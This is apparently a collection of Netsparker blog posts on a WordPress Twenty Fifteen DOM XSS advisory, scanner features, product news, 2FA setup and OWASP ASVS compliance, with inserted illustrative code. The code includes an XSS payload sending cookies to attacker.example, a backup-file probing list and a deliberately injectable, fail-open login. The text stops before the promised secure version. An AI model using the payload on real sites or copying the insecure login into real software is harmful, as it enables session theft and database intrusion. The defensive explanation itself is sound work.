
Netsparker Web Scanner Automatically Identifies DOM XSS Vulnerability in WordPress Default Theme


Today we published advisory CVE-2015-3429 about a DOM-based cross-site scripting vulnerability in Twenty Fifteen, the default WordPress theme. Twenty Fifteen has shipped with WordPress since version 4.1, released on 18 December 2014.

Millions of WordPress Websites Vulnerable to DOM XSS

Since the Twenty Fifteen theme ships with WordPress by default, many WordPress users never delete it from their installation even when they use another theme. Even though the theme is not activated, the vulnerable files can still be requested by attackers, so such sites remain vulnerable to DOM XSS. Considering that WordPress powers around 20% of the websites on the internet, there could be millions of WordPress websites exposed to this DOM XSS vulnerability.

How Are DOM XSS Vulnerabilities Typically Exploited?

To exploit a DOM-based cross-site scripting vulnerability such as this one, the attacker first identifies a vulnerable website and then emails its users a link that triggers the vulnerability and runs a script which steals the users' cookies. Instead of an email, the attacker can also post the malicious link as a comment on the website itself.

To persuade users to click, attackers typically send legitimate-looking emails advising them to follow the link to update their profile, change their password and so on. Because the malicious link points at the legitimate website's own domain, users, and sometimes even administrators, fall for this kind of trick.

Once a user clicks the link and the attacker obtains the user's cookie, the attacker can load that cookie into his own browser and take over the user's session. If the session cookie is flagged HttpOnly the injected script cannot read it, but it can still issue requests inside the victim's session, so the outcome is the same. Should the victim be a WordPress administrator, the attacker gains administrative privileges on the vulnerable website; typically the attacker then creates another administrator account to retain access and operate unnoticed. For more detailed technical information on this class of vulnerability, read our article on DOM-based cross-site scripting.
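The exploitation flow described above, as an added example that is not part of the original advisory and is not the code of genericons/example.html: a constructed page script reads an icon name from the URL fragment and writes it into an HTML sink, next to a hardened version that validates and encodes the value. The HTML sink is modelled as the returned string so the logic runs in Node; in a browser the same string would be assigned to element.innerHTML. The hostnames and the onerror payload are assumptions for illustration. Note that in a fragment-based sink like this one the payload never leaves the browser, so server logs and server-side filters do not see it.

```javascript
// Constructed example of a DOM-based XSS sink and its hardened form.
// Not the code of the Twenty Fifteen theme; hostnames are placeholders.

// location.hash arrives with a leading '#'; decode it the way such pages do.
function iconFromHash(hash) {
  try {
    return decodeURIComponent(hash.replace(/^#/, ''));
  } catch {
    return ''; // malformed percent-encoding
  }
}

// Vulnerable pattern: attacker-controlled fragment concatenated into markup.
function renderIconUnsafe(hash) {
  return '<h2>Icon: ' + iconFromHash(hash) + '</h2>';
}

// Allowlist describing what a genuine icon name looks like.
const ICON_NAME = /^[a-z0-9-]{1,40}$/;

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: reject anything outside the allowlist, and still encode
// before the value reaches an HTML sink (defence in depth).
function renderIconSafe(hash) {
  const name = iconFromHash(hash);
  if (!ICON_NAME.test(name)) return '<h2>Icon: (unknown)</h2>';
  return '<h2>Icon: ' + escapeHtml(name) + '</h2>';
}

// The link carried by the phishing email. Everything after '#' stays in the
// browser and is never sent to the server. (Constructed payload.)
const ATTACK_URL =
  'https://victim.example/wp-content/themes/twentyfifteen/genericons/example.html#' +
  encodeURIComponent(
    `<img src=x onerror="location='https://attacker.example/?c='+document.cookie">`
  );

function fragmentOf(url) {
  return new URL(url).hash; // what window.location.hash would hold
}

// Stand-alone demonstration.
console.log('unsafe :', renderIconUnsafe(fragmentOf(ATTACK_URL)));
console.log('safe   :', renderIconSafe(fragmentOf(ATTACK_URL)));
console.log('normal :', renderIconSafe('#genericon-wordpress'));
```

The allowlist is the real fix here: an icon name has no business containing markup characters, so validation removes the whole class of payloads, and encoding catches anything the allowlist is later loosened to admit.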

How to Fix this WordPress DOM XSS?

WordPress has just released WordPress 4.2.2, a security and maintenance release that addresses this and other issues. If you have automatic updates enabled, your WordPress websites have most probably been updated already. If you do not want to update to 4.2.2, which is not recommended, you can:

a) update only the Twenty Fifteen theme, or, if you are not using it, simply uninstall it from your WordPress website, or

b) delete the vulnerable file example.html, found in the following WordPress directory: /wp-content/themes/twentyfifteen/genericons/example.html

Remember that an inactive theme is still reachable by URL, so the file has to go from every installation where the theme is present, not only from sites that have it activated.


Netsparker 4.1 Release - New Security Checks and Improvements


Today we are announcing the release of Netsparker Desktop 4.1. This new version includes a number of new web application security checks and improvements, as explained below.

Web Form Hijacking Security Check

Web form hijacking is the exploitation of a vulnerable page that lets an attacker capture the contents of a form on it. The attacker leads the victim to the form via a specially crafted URL that exploits the vulnerability; once the victim fills the form in, the POST data is sent to a server the attacker controls instead of the legitimate one.

Base Tag Hijacking Web Security Check

When a web application is vulnerable to base tag hijacking, attackers can control the href attribute of the HTML base element. Every relative URL on the page (images, scripts, form actions) is then resolved against a domain the attacker controls, so the attacker can serve JavaScript that runs in the context of the page. The impact of this vulnerability is therefore almost the same as that of a cross-site scripting vulnerability.
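A check covering both of the sinks described in the two sections above, as an added example that is not Netsparker's own check: it scans a page's HTML for a base element and for form actions, resolves each against the page URL (honouring the first base, as browsers do) and reports any that land on a foreign origin. The sample HTML and hostnames are constructed for the example.

```javascript
// Added example: flag <base href> and <form action> values that point off
// the page's origin. Constructed sample data; not Netsparker's own signatures.

const BASE_RE = /<base\b[^>]*\bhref\s*=\s*["']?([^"'\s>]+)/gi;
const FORM_RE = /<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi;

function findHijackSinks(html, pageUrl) {
  const page = new URL(pageUrl);
  const findings = [];

  // Browsers honour only the first <base href>; later ones are ignored.
  let effectiveBase = page;
  const baseMatch = BASE_RE.exec(html);
  BASE_RE.lastIndex = 0;
  if (baseMatch) {
    const target = new URL(baseMatch[1], page);
    if (target.origin !== page.origin) {
      findings.push({ kind: 'base', target: target.href });
    }
    effectiveBase = target;
  }

  // Relative form actions resolve against the effective base, which is
  // exactly how a hijacked base element redirects a legitimate form.
  let m;
  while ((m = FORM_RE.exec(html))) {
    const target = new URL(m[1], effectiveBase);
    if (target.origin !== page.origin) {
      findings.push({ kind: 'form', target: target.href });
    }
  }
  FORM_RE.lastIndex = 0;
  return findings;
}

// Constructed page: a hijacked base, a relative login form that now posts
// to the attacker, a same-origin search form, and an absolute off-site form.
const SAMPLE_HTML = `<html><head><base href="http://attacker.example/"></head><body>
<form action="login.php" method="post"><input name="user"><input name="pass" type="password"></form>
<form action="https://shop.example/search"><input name="q"></form>
<form action="https://attacker.example/collect" method="post"><input name="card"></form>
</body></html>`;

const CLEAN_HTML = `<html><body>
<form action="/login" method="post"><input name="user"></form>
</body></html>`;

// Stand-alone demonstration.
for (const f of findHijackSinks(SAMPLE_HTML, 'https://shop.example/account')) {
  console.log(`${f.kind.padEnd(4)} -> ${f.target}`);
}
```

The same-origin comparison is deliberately strict: a form posting to a sibling host is reported too, and a human decides whether that is an integration or a leak. Scheme changes (https page, http target) are also caught because the origin includes the scheme.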

Other Major Improvements

Detection of Backup Files on Websites

This version also improves the scanner's detection of backup files on websites. Backup files do not have the direct impact of, say, a SQL injection vulnerability, which once exploited gives the attacker access to the backend database. A discovered backup file, however, can contain source code or configuration that helps an attacker craft a better attack, so it is good to know about them as well.

Configuration of Backup Files Signatures

We also moved the Backup Files signatures into the Scan Policy Editor, so users can modify the list of signatures and easily add their own, as shown in the screenshot below.

Configuring backup files security check using the Netsparker Scan Policy Editor
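What a backup-file signature list amounts to in practice, as an added example that is not Netsparker's own signature list: given a resource the crawler has already seen, derive the backup names a scanner would request for it (editor swap files, copies with .bak/.old suffixes, archives, renamed stems), and a small heuristic for telling a real hit from a server that answers 200 to everything. The suffix and prefix lists are constructed from common administrator and editor habits.

```javascript
// Added example, not Netsparker's signatures: candidate backup names for a
// known resource, plus a heuristic for judging a response. Constructed lists.

const SUFFIXES = ['.bak', '.old', '.orig', '.save', '.tmp', '~', '.copy', '.txt',
                  '.zip', '.tar.gz', '.rar', '.7z'];
const PREFIXES = ['.', '_', 'backup_'];
const STEM_SUFFIXES = ['.1', '_backup', '_old', '-old'];

function backupCandidates(urlPath) {
  const parts = new URL(urlPath, 'http://placeholder').pathname.split('/');
  const file = parts.pop();
  if (!file) return []; // a directory URL: nothing to derive a backup name from
  const dir = parts.join('/') + '/';

  const dot = file.lastIndexOf('.');
  const stem = dot > 0 ? file.slice(0, dot) : file;
  const ext = file.slice(stem.length);
  const names = new Set();

  for (const s of SUFFIXES) {
    names.add(file + s);                    // config.php.bak
    if (ext) names.add(stem + s);           // config.bak
  }
  for (const p of PREFIXES) names.add(p + file);      // .config.php, _config.php
  for (const s of STEM_SUFFIXES) names.add(stem + s + ext); // config_old.php
  names.add('.' + file + '.swp');           // vim swap file
  names.add(file + '.swp');
  names.delete(file);
  return [...names].map((n) => dir + n);
}

// A backup of server-side code is only interesting if the server hands it back
// as text rather than executing it. Compare the candidate's response with a
// baseline request for a random name so soft-404 servers do not flood results.
function isLikelyBackupHit(candidate, baseline) {
  if (candidate.status !== 200) return false;
  if (baseline.status === 200 && baseline.body === candidate.body) return false;
  return /<\?php|<%@|^#!\/|password\s*=/im.test(candidate.body);
}

// Stand-alone demonstration with a constructed response pair.
console.log(backupCandidates('/wp-config.php').join('\n'));
console.log(isLikelyBackupHit(
  { status: 200, body: "<?php define('DB_PASSWORD', 'secret');" },
  { status: 404, body: 'Not Found' },
));
```

The baseline comparison matters more than the name list: many frameworks return a friendly 200 page for unknown paths, and without it every candidate looks like a find.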

Detection of Common Directories on Websites

Similar to backup files, common directories do not directly compromise a website, though they can certainly ease an attacker's job: an attacker will pay more attention to a directory called /admin/ than to one called /samples/.

Netsparker 4.1 ChangeLog

The above are just the major highlights for this version of Netsparker. For a complete list of all that has been improved and fixed refer to the Netsparker Desktop changelog.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a window with the upgrade details will appear the next time you run Netsparker. Alternatively, click Check for Updates in the Help menu to check for updates manually.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.

Netsparker Partners with Strong Crypto Innovations


We are pleased to announce the appointment of Strong Crypto Innovations as Netsparker Desktop and Netsparker Cloud reseller in the US. Strong Crypto Innovations is based in Virginia and has been providing security services and solutions to organizations since 2006.

Integrating Automated Web Application Security Scanning in the SDLC

Strong Crypto Innovations is committed to helping organizations integrate automated web application security scanning into their SDLC, a process made much easier by the full API of Netsparker Cloud, Netsparker's latest enterprise-level online service.

“Offering Netsparker Cloud provides Strong Crypto’s customers with the tools to strengthen their web application security programs in a long-term and sustained way,” said Alexander J. Fry, President at Strong Crypto Innovations. “With Netsparker Cloud, our customers can quickly and easily implement a continuous monitoring program as well as address FISMA and PCI compliance requirements.”

The Netsparker Cloud online service also complements Strong Crypto's business model and the penetration testing services it provides to its customers. Strong Crypto Innovations is also using Netsparker's false positive free scanning technology to provide web application security services to organizations that do not have such capabilities in-house.

For more information about Strong Crypto Innovations visit https://www.strongcrypto.com/. Contact us if you would like to start reselling Netsparker web application security scanners in your country.

The End of Life for Netsparker Community Edition


When we started Netsparker we released Netsparker Community Edition, a free SQL Injection scanner. Many of you are familiar with it; to this day it generates thousands of downloads each month.

There were several reasons why we released Netsparker Community Edition back then, but mainly, as the name implies, it was to help the community and to help us grow and learn about the industry.

Helping the Community

To this day many businesses and organizations are not aware of the need to secure their websites and web applications, or of the impact a hacked website can have on their business and its reputation. Since Netsparker CE was a free SQL Injection scanner, many downloaded it and started using it, helping thousands of businesses identify and fix SQL Injection vulnerabilities in their websites.

Learning About the Industry

Even though most of our management team has years of experience in the security and software industry, like every other startup we still needed to learn as much as possible about the automated web vulnerability scanning industry, and Netsparker Community Edition helped us learn a lot. We are truly grateful to everyone who used it and sent us feedback.

Time to Move On

As a company our aim was always to develop a product that any business or organization can use to ensure the security of its websites, regardless of whether it has a dedicated security team or whether its users are seasoned security professionals. To this day we are happy to say that we have achieved this. In fact, even though Netsparker is just six years old and the youngest company in this industry, we are already rated as one of the top players.

A few months back we launched the only false positive free online web application security scanner, Netsparker Cloud. It is our enterprise online service offering and, like any new product, there is a lot of hard work still to be done. So to ensure the quality of our products, Netsparker Desktop and Netsparker Cloud, we decided to discontinue Netsparker Community Edition and focus all our resources on them.

Thank You

So far the Netsparker adventure has been a great ride, and without Netsparker Community Edition it would have been different, and maybe not as successful. Thanks to the feedback we received we have built the best automated web scanning engines available on the market, and we want to continue building on that success. We are also very happy that Netsparker helped many businesses get started with web application security, and hopefully helped create a safer and more secure internet.

I’d like to personally thank every one of you who gave us feedback and was involved in this adventure, and encourage every Netsparker Community Edition user to switch to Netsparker Desktop or Netsparker Cloud. After all, web application security is not just about SQL Injections. Feel free to get in touch with us with any queries you might have and happy scans!

Security Weekly Interviews Ferruh Mavituna about Web Application Security


A few days back our CEO and Product Architect Ferruh Mavituna was interviewed by Paul Asadoorian from Security Weekly, a popular podcast that provides free content within the subject matter of IT security news, vulnerabilities, hacking, and research.

During the thirty-minute interview, Ferruh explains how he got started with web application security and talks about several other web application security subjects, such as the effectiveness of web application firewalls, the importance of automating the detection of vulnerabilities in web applications, how organizations and large enterprises can leverage security tools such as Netsparker Cloud to ensure the security of their web applications, and why security tools need to be easy to use.

Ferruh also explains why Netsparker Cloud, Netsparker's online web application security scanner, puts so much focus on the workflow that follows the discovery of a vulnerability, how the Netsparker team researches new vulnerabilities and security issues, and Netsparker's bold claim: false positive free web vulnerability scanning technology.

Netsparker Sponsors PHPKonf 2015 in Istanbul


Netsparker is happy to announce its sponsorship of PHPKonf 2015, a conference for PHP developers held between the 25th and 27th of July at Bahcesehir University, Istanbul. PHPKonf is hosted by the Istanbul PHP Community (IstanbulPHP) and features 27 talks delivered by some of the best PHP speakers, from companies such as Zend, Symfony, Sensio Labs and Microsoft.

Visit the Netsparker Booth for Free Online Web Application Security Scans

We will also have a booth exhibiting Netsparker Desktop and Netsparker Cloud, the only false positive free web application security scanners on the market. Come and say hello and collect some of our swag.

We will be also giving away one month of free online web application security scans for one website to anyone who is interested in Netsparker Cloud, so pass by our booth if you would like to have your website scanned with Netsparker Cloud.

We look forward to seeing you there!

Free Online Web Application Security Scans for Open Source Projects


We are happy to announce that we are giving free online web application security scans to all developers of open source web applications, with absolutely no strings attached, via a free Netsparker Cloud account. Netsparker Cloud is the only false positive free online web application security scanner.

At Netsparker we appreciate how much we have benefited from the open source community and we would like to give something back, and to also ensure more secure development of open source web applications for the future. If you are an individual (genius) developer, or work with a team of (genius) developers and would like to get your free online web application security scans, send us an email on info@netsparker.com, tell us which open source project you are working on and the URL and we will get you started immediately.

Testing the Web Vulnerability Scanners with Open Source Applications

The secret of our scanning engine's vulnerability detection capabilities is simple: substantial research and even more testing. Testing is our utmost priority because our end users will run our desktop and online web application security scanners against a multitude of web applications, each built on a wide range of technologies.

To get a good overview of what web applications our users will scan, we built a test lab of open source web applications that closely mirrors real deployments, which we constantly scan, test and refine, and then test some more.

The rationale for all this scanning and testing is that a big chunk of the websites and web applications we access every day, be it for leisure or for business, are powered by open source web applications such as WordPress, Joomla!, Drupal, miniBB, TWiki and many others. They are so popular because they are available for free and typically lead the industry in innovation and features.

The downside is that these open source web applications can be vulnerable to attack due to a lack of security testing. Netsparker knows this first hand from our ongoing testing of all types of web applications. As part of this testing, Netsparker has identified a significant number of vulnerabilities in open source web applications, and we recently published an infographic highlighting them. Earlier this year we also published a report summarizing the types of vulnerabilities covered in our advisories.

Giving Back to the Open Source Community

The fact is that without open source web applications this whole process would have been more difficult, costly and time consuming. We also know that 'free' does not pay the bills, or even buy a slice of pizza, and most open source web applications are side projects for their developers. Most of the time they do not have the budget to buy security tools that would help them build more secure web applications.

We at Netsparker appreciate how much we have benefited from the open source community and we would like to give something back. We also want to ensure more secure development of open source web applications in the future.

Open Source Developer? Apply For Free Netsparker Cloud Scans

So, as a big ‘Thank you’ to all the open source developers, we will be giving away free Online web application security scans to developers of open source web applications. This will allow them to automatically scan their web application for vulnerabilities and security flaws. No surprises, no hidden costs, no strings attached! If you are a developer of an open source web application project just send us an email on info@netsparker.com and let us know which open source project you are working on.

We are more than happy to help you get started and to also give you some tips on how to get the best out of our online web application security scanner. Netsparker Cloud is a multi user platform with a web application vulnerability management system, so if you are a team you can collaborate together and ensure all vulnerabilities in your web applications are solved before you release your next update, thus gaining more trust from your users.

How to Enable Two-factor Authentication in Netsparker Cloud


Netsparker Cloud users can enable two-factor authentication, also known as two-step verification, to add an extra layer of security to their Netsparker Cloud account. Once it is enabled, logging in to Netsparker Cloud asks for your password and a one-time code. Configuring it is very easy, as this article explains.

Enable Two-factor Authentication on Netsparker Cloud

  1. Log in to your Netsparker Cloud account.
  2. Click on the Security node under the Your Account menu entry and click Enable two-factor Authentication.

  Enable two-factor authentication in Netsparker Cloud from the Security node in Your Account menu

  3. Install a two-factor authentication app on your phone. A popular choice is Google Authenticator, available from Google Play or the App Store.
  4. Launch the app and scan the QR Code displayed on your Netsparker Cloud dashboard, as highlighted below.

 Scan the QR Code to add Netsparker Cloud to your two-factor authentication application

  5. Once the code is scanned, the app adds a Netsparker Cloud verification code entry, as in the screenshot below (taken with the Google Authenticator app).

 Google Authenticator generates a one-time code that can be used to login to Netsparker Cloud

  6. Enter your Netsparker Cloud password in the Current Password field and the 6-digit code shown in the app in the field underneath.
  7. Click Configure to finalize the setup.

The next time you log in to Netsparker Cloud you will be asked for your email and password as usual, and then for the one-time code from your mobile app. If you cannot access the app during login, use one of the recovery codes as explained in the following section.

Recovery Codes for Netsparker Cloud Two-factor Authentication

Once you setup two-factor authentication in Netsparker Cloud, the service will generate ten recovery codes as highlighted in the below screenshot.

10 recovery codes for Netsparker Cloud Two-factor authentication

Copy the recovery codes and keep them somewhere secure that only you and other trusted users can access. Recovery codes are only needed when you must log in and do not have access to the two-factor authentication app to generate a one-time code.

Using the Recovery Codes

If you need to login to Netsparker Cloud and you do not have access to the mobile app to generate a one time code, enter your email and password and when asked for the one time code specify one of the recovery codes.

Each recovery code can be used only once. Should you use all of them, disable and re-enable two-factor authentication to generate a new set.


Netsparker Cloud Update - Two-factor Authentication Support and Other Improvements


Today we are happy to announce an important update to our Netsparker Cloud product. From today, all Netsparker Cloud users can enable two-factor authentication to add an extra layer of security to their Netsparker Cloud account. We have also included some additional improvements in this update which are outlined in this post below.

Two-Factor Authentication in Netsparker Cloud

Your Netsparker Cloud account contains sensitive information about your websites and web applications, for example a 'to do' list of vulnerabilities that could still be exploited. This is exactly the kind of information you do not want to end up in the wrong hands, so ensuring the security of the sensitive data in your Netsparker Cloud account is a top priority.

We added two-factor authentication support to Netsparker Cloud to help you further protect that information. In case your password is ever stolen or guessed, the attacker still cannot access your sensitive data, because they also need a one-time code that is generated only by an application running on your mobile device. Follow our guide to set up two-factor authentication on Netsparker Cloud.

Other Netsparker Cloud Improvements

Ability to resend invitation emails: We added a button next to each invited user in the Netsparker Cloud dashboard so the account administrator can resend the invitation email should the user fail to receive the first one.

Option to resend a Netsparker Cloud invitation email to users

Permissions to Change Scan Policies: Users who need to make changes to Netsparker Cloud Scan Policies, such as adding a new one, or modifying an existing one, now need to have Start Scans permission to be able to do so.

Users need the Start Scan permission to be able to modify Scan Policies

Scheduled Scans: We have restructured the components that Netsparker Cloud uses to schedule web security scans to make it a more efficient & stable system.

Moving Forward, More Updates To Netsparker Cloud

As Netsparker Cloud is an online service, we work in a fast, dynamic environment and frequently add new functionality and new web security checks and fix bugs, most of which is transparent to you. For example, alongside the regular improvements made to Netsparker Cloud since its launch, based on customer feedback we also added the ability to generate PDF and HTML reports.

Netsparker Web Security Scan Report in PDF Format

Thank you for your time and stay tuned with us by following our blog or any of our social media channels to keep yourself up to date with what is new and improved in Netsparker Cloud, the only false positive free online web application security scanner.


Global Association ISACA Leads the Way on Web Application Security with Netsparker


“As we are faced with perpetual evolving security threats and vulnerabilities, Netsparker brings a level of assurance to our business as it is included as part of our development lifecycle to help identify and mitigate such threats prior to deployment. With Netsparker being able to provide zero false-positives, it ensures that time is not wasted deciphering whether a vulnerability is legitimate or not.” - Chris Evans, Security and Compliance Manager, ISACA.

ISACA is an independent, non-profit global association focused on the development and adoption of industry-leading best practices for information systems, IT governance and IT security. It serves more than 140,000 members and professionals holding ISACA certifications in more than 180 countries, most of whom are security consultants, professionals and educators.

The Risks and Repercussions of Getting Hacked

As an international association that advocates IT governance and security best practices to all its members, ISACA is considered a leader in the community of IT security experts. Therefore, as part of its security practice, a top priority is placed on ensuring all of its websites and portals are constantly monitored for security threats and vulnerabilities, which could arise at any time.

If any of ISACA's websites succumbed to a security breach, it could lead to the loss of private user information and data, or to the loss of control over the affected website. Unauthorized access to user data, or an unusable website, would damage the association's reputation as the arbiter of IT governance and security practices and cause a significant public relations crisis.

For the leaders in advocating security, compliance and IT governance best practices, who deliver courses and training on these subjects, suffering any security breach is simply not acceptable.

The Web Application Security Challenge

As an international organisation, ISACA not only hosts its main website but also hosts and maintains several other related websites, which contain multiple login forms, user registration areas, online payment capabilities, different user portals and tens of thousands of pages. Auditing and securing such a large portfolio of international websites is not a simple task.

In adherence to its own best practices for security, ISACA has a staging environment where all code is thoroughly tested before being transferred to live environments. Despite these protocols, ISACA's security department still faced a large operational task: maintaining the integrity of all its sites while they are frequently changed and updated to address the business needs and services of the individual websites in the portfolio. This is a major challenge for all international businesses, and ISACA was no different.

ISACA's previous approach was to use open source tools and rely on third-party consultants. Unfortunately, most of the tools only provided high-level details about the issues and were relatively unreliable. Highly trained consultants are, by their nature, very expensive, and it is virtually impossible for consultants to audit every attack surface of every website around the clock. ISACA therefore urgently needed an alternative: ideally one that automated the identification of vulnerabilities and security issues and could be used across multiple websites simultaneously.

The Solution: Automating Web Application Security

As part of its due diligence, ISACA's security team tested several tools before choosing Netsparker Web Application Security Scanner. The main reasons for choosing Netsparker over the rest are captured in the team's own feedback.

Feedback from the senior management of the ISACA security team demonstrated that: “Netsparker was able to further define and explain the specific issues at hand. It was also able to assist in the proof of concept for vulnerability assessments during development.”

“It is very easy to use, thus allowed everyone in our team to cooperate. Of course, the ability to customize, scan, and automate the tasks was a big plus. Netsparker helped us identify the areas to remediate before we migrated new code into the production environment.”

For over three years, Netsparker has been an integral part of ISACA's development life cycle and has been used to scan website changes and new web applications, both on the staging server and in the development environment.

Staying on Top of the Web Application Security Game

Identifying vulnerabilities is one thing; continuously developing secure code and staying on top of the game throughout the years is another.

A company or organization may have access to the best tools in the world, but they are of little use unless backed by professional, trustworthy support that can be relied on unconditionally. Top-notch support is precisely what ISACA was looking for in the first place: not just a product, but a partner to help when their backs are against the wall.

Like everyone else in this industry, ISACA’s security experts have had their share of challenges when securing web applications, but they have found the help they needed every single time. “Netsparker support has been engaged, they are very detailed and thorough. I am completely satisfied when speaking to Support on any issue or question that we have had,” Evans concluded.

About ISACA

As an independent, non-profit, global association, ISACA engages in the development, adoption and use of globally accepted, industry-leading knowledge and practices for information systems. Previously known as the Information Systems Audit and Control Association, ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.

About Netsparker Web Application Security Scanner

Netsparker Web Application Security Scanner is an industry-leading automated web application security scanner developed by Netsparker Ltd. Netsparker's management and engineers have more than a decade of experience in the web application security industry, and this is reflected in their products. Netsparker is very easy to use and automates most of web application security scanning: an out-of-the-box installation can scan a wide variety of web applications, so web security experts, penetration testers and QA engineers do not need to spend countless hours tweaking and configuring the software. Netsparker is revolutionising web application security as the only web application security scanner that automatically verifies detected vulnerabilities, thus reporting no false positives. Netsparker is used by world-renowned companies such as Samsung, NASA, Skype, ING, ISACA and Ernst & Young.

Using Netsparker To Comply With The OWASP Application Security Verification Standard When Developing Web Applications


What is OWASP?

In December 2001, the Open Web Application Security Project (OWASP) was established as an international not-for-profit organization dedicated to discussing and improving web security. For practically its entire existence OWASP has catalogued the ways web applications get attacked: social engineering, weak authentication, cross-site scripting, DOM XSS, SQL injection, general software vulnerabilities and more. In short, OWASP has kept track and encouraged the web community to continually secure everything as well as possible.

OWASP's mission has always been to encourage good security practice, not only by highlighting the most exploited and critical vulnerabilities but also by providing leadership in the security community so that education and understanding reach as many administrators as possible. Separately, since 1999 the Common Vulnerabilities and Exposures (CVE) dictionary has existed to track known software vulnerabilities and alert consumers and developers alike.

OWASP's best-known output, the Top 10, has focused on the most common classes of vulnerability, and its advice has centred on understanding those categories. Now, after an initial attempt in 2009 and a review of industry feedback, OWASP is focusing on a strictly defined standard intended to prevent such vulnerabilities in the first place.

Standardizing Security’s More Dynamic Side

When dealing with web application security, there are three main areas of entry most commonly exploited by attackers:

  • the people that hold privileged access to the application;
  • the services that support the application;
  • the functions of the application itself.

Privileged access is valued the most, especially when going for high-value targets and not just trying to blindly run a few scripts against a website. There exists a critical amount of social engineering in all of the biggest hacks in the past few years. In fact, even the most prestigious security researchers themselves are not immune from such techniques.

Kaspersky Lab, a prominent figure in the security industry famous for uncovering nation-state attacks such as Stuxnet, recently found itself the target of just such an incredibly detailed and intricate precision spear phishing attack, of a kind not seen outside of clandestine cyber warfare against Iran and other nations. Services are also high-value targets, especially recently. The infamous Heartbleed and Shellshock vulnerabilities were not part of the most popular categories in the OWASP Top 10 list, but that did not stop them from quickly becoming among the most critical of the past decade.

The services that support a web application find themselves usually in one of two categories when it comes to attacks: a specific vulnerability exploited with precise focus, such as a 0day, or a broad vulnerability attacking a major weakness, such as a distributed denial-of-service attack. Typically, most service-based attacks fall in the latter category, but recently precision attacks have been making headlines, namely due to their widespread effect because of the ubiquity of the software being used.

However, the functions of the web application itself fall into the most commonly exploited categories year after year. For over a decade, the SQL injection vulnerability remained at the top of OWASP’s top 10 list of vulnerabilities, with over 6,500 major, widespread vulnerabilities in 15 years affecting both open- and closed-source software. The difficulty in preventing these kinds of attacks stems from the fact that the web application itself is highly dynamic, so no easy “apply this patch” sort of fix exists. It is through the Application Security Verification Standard (ASVS) that OWASP intends to bring focus to the dynamic nature of development by providing strict and explicitly defined security guidelines.

How Netsparker Can Help in Writing More Secure Web Applications

Typically a web application security scanner is applied after the fact, when the development of the web application has mostly been done already. Yet development, at the time of writing the code itself, can benefit from a web scanner as well. In good coding practice, unit tests are employed in all major functional areas of software. Here, too, a scanner can be used effectively as another level of unit testing.

A Cross-site Scripting Vulnerability Identified Automatically with Netsparker Web Application Security Scanner

From the screenshot above you can already see how Netsparker can provide a thorough assessment of not only particular vulnerabilities, but how they are classified by various existing definitions and standards, such as PCI compliance and OWASP vulnerability classifications.

This is indeed a highly useful tool when investigating a web application, however it is usually applied after the application is mostly developed, as we mentioned earlier.

Introducing Security During the Early Stages of Web Application Development

In fact, major organizations like Microsoft encourage the practice of running security analysis synchronously with development -- known as a Security Development Lifecycle. Netsparker Cloud even has an API system that could be triggered from continual build systems, like Atlassian Bamboo or Jenkins, to provide real-time and automated web application security audits. These assessments and classifications can be equally, if not more so useful during the development stage, as they save time, money, and potential major headaches.

Introduction to OWASP ASVS

The OWASP ASVS standard has various levels of classification, ranging from 0 through 3, starting at a cursory verification (preliminary scans, for example) and going all the way through to advanced, where the application is secured against all known and potential threats. By definition, the zeroth classification is intended by OWASP to be where scanners are utilized, but Netsparker provides the opportunity to reach all the way to the extended areas of the advanced classification, too. This is because of Netsparker’s in-depth heuristics, advanced scanning features including authentication and user input, and especially its incredible flexibility to be fine-tuned for specifics that are unique to each application.

In the OWASP ASVS standard, there exist various verification requirement categories, such as V2 - Authentication, V3 - Session Management, and so forth. Within these categories are specific requirements that must be met in order to satisfy various classification levels. For example, in the V2 - Authentication requirement category, V2.6 requires developers “[v]erify all authentication controls fail securely to ensure attackers cannot log in” in order to meet at least level 1 “Opportunistic” certification. Netsparker can go beyond the level 0 cursory scanning, helping to meet even level 3 “Advanced” certification by assisting a development team in testing and validating their application, in this instance by testing to validate the V2.6 requirement.

Other categories can find much benefit in the Netsparker web security scanner, too. The V5 requirement category – “Malicious Input Handling” – is one of many categories where Netsparker can particularly excel. V5.10, for example, requires developers “[v]erify that the runtime environment is not susceptible to SQL Injection, or that security controls prevent SQL Injection” – an area Netsparker checks thoroughly. In fact, Netsparker is capable of identifying over 200 kinds of vulnerabilities, far exceeding the number of vulnerabilities to secure against to meet ASVS level 3 certification.
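The two requirements quoted above, V2.6 (authentication controls fail securely) and V5.10 (the runtime is not susceptible to SQL injection), are easiest to appreciate side by side in code. The following is an added illustration written for this page, not Netsparker's or OWASP's own code: a login routine that violates both requirements beside one that satisfies them, run against a constructed in-memory SQLite database with a single sample user. The user name, password, PBKDF2 parameters and function names are all assumptions made for the example.

```python
"""Added example: OWASP ASVS V2.6 (fail securely) and V5.10 (no SQL injection)
shown as a fail-open, string-built login beside a fail-secure, parameterized one.
Not Netsparker or OWASP code; sample data below is constructed for the example."""
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 10_000  # assumption for the example; production would use more


def _hash(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256 of the password (illustrative choice)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one user, 'alice', with a hashed password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("alice", salt, _hash("correct horse", salt)))
    conn.commit()
    return conn


def login_fail_open(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Deliberately bad: violates V5.10 (query built from user input) and
    V2.6 (default allow; an unknown user or a database error still logs in)."""
    authenticated = True  # BAD: default allow, only flipped on an explicit mismatch
    try:
        row = conn.execute(
            "SELECT salt, pw_hash FROM users WHERE username = '" + username + "'"  # BAD: V5.10
        ).fetchone()
        if row is not None and row[1] != _hash(password, row[0]):
            authenticated = False
    except sqlite3.Error:
        pass  # BAD: V2.6, a lookup error leaves the default allow in place
    return authenticated


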